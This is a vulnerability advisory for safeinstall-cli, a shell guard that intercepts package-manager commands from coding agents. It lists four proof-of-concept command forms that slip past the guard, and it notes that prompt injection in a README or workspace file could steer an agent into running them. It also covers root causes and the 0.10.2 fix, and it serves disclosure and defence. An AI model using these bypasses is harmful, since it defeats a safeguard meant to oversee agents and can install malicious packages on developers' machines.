safeinstall-cli Agent Guard Shell Parsing Bypass
A crafted shell command sent to a coding agent can slip past the SafeInstall guard entirely, letting a malicious package install and run lifecycle scripts without any policy check.
The problem
safeinstall-cli through 0.10.1 installs a shell guard that intercepts package-manager commands issued by coding agents. The guard classifies commands with a string-matching parser that fails under four conditions: case-variant launcher names, leading file-descriptor redirections, shell wrappers with options, and package-manager create/init subcommands.
When the guard misses a command, it passes the raw invocation straight to the system shell with no policy decision and no lifecycle-script suppression. An attacker who can influence a coding agent's instructions (for example via prompt injection in a README or workspace file) can trigger one of these forms and install arbitrary packages with the permissions of the developer account.
Proof of concept
A working proof-of-concept for this issue in safeinstall-cli, with the exact payload below.
# 1. Case-variant launcher name -- guard only matched lowercase 'npm'
NPM install attacker-pkg
# 2. Leading file-descriptor redirection parsed before the command name
2>/dev/null npm install attacker-pkg
# 3. Shell wrapper with option -- guard missed 'env -i' prefix
env -i npm install attacker-pkg
# 4. create/init subcommand -- routed as a plain command, not through registry-runner approval
npm create attacker-pkg@latestThe root causes are CWE-178 (Improper Handling of Case Sensitivity) and CWE-693 (Protection Mechanism Failure). The guard compared the literal command token against a fixed lowercase allowlist, so any casing variation or prefix token caused a no-match and the command fell through unguarded.
Leading redirections (e.g. '2>/dev/null') shifted the effective command token to position two, which the old parser never inspected. Shell wrappers like 'env -i' have option arity the old parser did not account for, so the embedded package-manager name was never reached.
The create/init bypass is a logical gap: those subcommands invoke registry-hosted scaffolding runners but were not routed through the same approval path as other registry runners.
The 0.10.2 patch normalizes launcher names to lowercase before matching, strips leading redirections before classification, handles wrapper option arity conservatively and fails closed on ambiguous syntax, and routes create/init through the registry-runner approval path.
The fix
Upgrade to safeinstall-cli 0.10.2 or later. The release normalizes launcher names, pre-strips redirections, tightens wrapper parsing, and closes the create/init approval gap. Until upgrade is possible, manually review every shell command the coding agent issues and prevent it from invoking package managers or registry runners directly.
Reported by SafeInstall maintainer (Mickdownunder).
Related research
- high · 7.5CVE-2026-55487CVE-2026-55487: pnpm allowBuilds Build Policy Identity Spoof
- high · 7.5CVE-2026-49866CVE-2026-49866: @libp2p/gossipsub CPU DoS via Oversized IHAVE and IWANT Control Messages
- high · 7.7CVE-2026-53514CVE-2026-53514: better-auth Organization Invitation Takeover via Unverified Email Pre-Registration
- high · 8.3CVE-2026-53516CVE-2026-53516: better-auth OAuth Auto-Link Account Takeover via Unverified Email